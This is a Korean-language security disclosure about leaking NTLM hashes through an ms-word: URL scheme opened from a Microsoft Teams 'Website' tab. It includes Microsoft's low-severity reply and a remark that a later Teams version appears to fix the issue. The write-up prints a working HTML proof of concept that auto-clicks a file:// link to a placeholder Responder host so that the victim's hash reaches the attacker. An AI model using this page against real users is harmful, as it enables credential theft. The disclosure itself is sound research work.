
MS Office를 통해 Teams의 웹사이트 탭에서 NTLM 누출
사용자가 특수하게 설계된 웹페이지로 연결되는 "웹 사이트" 탭으로 이동하면 Office URL 스킴의 활성화를 통해 NTLM 해시가 노출될 수 있으며, 이로 인해 해시 누출 과정이 단 한 번의 클릭으로 단순화됩니다.
브라우저에서 ms-word:ofv|u|file://Share/File.docx 형식의 링크를 열려고 하면 다음 단계가 필요합니다:
1- 사용자는 Word를 열 의사가 있음을 확인해야 합니다.
2- 사용자는 MS Office의 경고 메시지에 표시된 위험을 인지하고 수락해야 합니다.
그러나 웹 사이트 탭에서는 사용자의 작업이 위험 수락 하나로 단순화됩니다.
<html>
<head>
<title>Auto Open Document</title>
</head>
<body>
<a href="ms-word:ofv|u|file://ResponderIP_Or_MachineName/File.docx" id="autoOpenLink"></a>
<script>
window.onload = function() {
document.getElementById('autoOpenLink').click();
};
</script>
</body>
</html>
3. Teams에서 방금 설정한 웹페이지로 연결되는 "웹 사이트" 탭을 설정합니다. 4. "탭"에 접근합니다.
탭을 방문하면 JavaScript로 트리거된 링크가 자동으로 Word 열기를 시작합니다. 사용자가 Word의 프롬프트에서 "예"를 클릭하여 동의하면 해당 사용자의 NTLM 해시가 "공격자"의 머신으로 전송됩니다.

2024년 3월 27일 수요일 20:23, Microsoft 보안 대응 센터 <[email protected]mailto:[[email protected]](mailto:[email protected])> 작성:
안녕하세요,
제출해 주셔서 감사합니다. 귀하의 보고가 유효함을 확인했지만, 이슈의 심각도가 낮아 즉각적인 서비스 제공 기준에는 미치지 못한다고 판단했습니다. 저희 엔지니어들은 NTLM이 유출되기 전에 사용자가 여전히 Word 또는 기타 Office 클라이언트에서 동의해야 하므로 심각도가 낮아진다고 밝혔습니다. 그러나 저희는 제품을 개선할 기회로 삼기 위해 귀하의 보고를 향후 검토 대상으로 표시했으며, 개선할 기능 이슈로 등록했습니다. 이 검토에 대한 일정은 아직 없습니다. 현재로서는 추가 조치가 필요하지 않으므로 이 건을 종료합니다.
감사합니다,
MSRC
Microsoft Teams 버전 24033.813.2773.520. 에서 수정된 것으로 보입니다.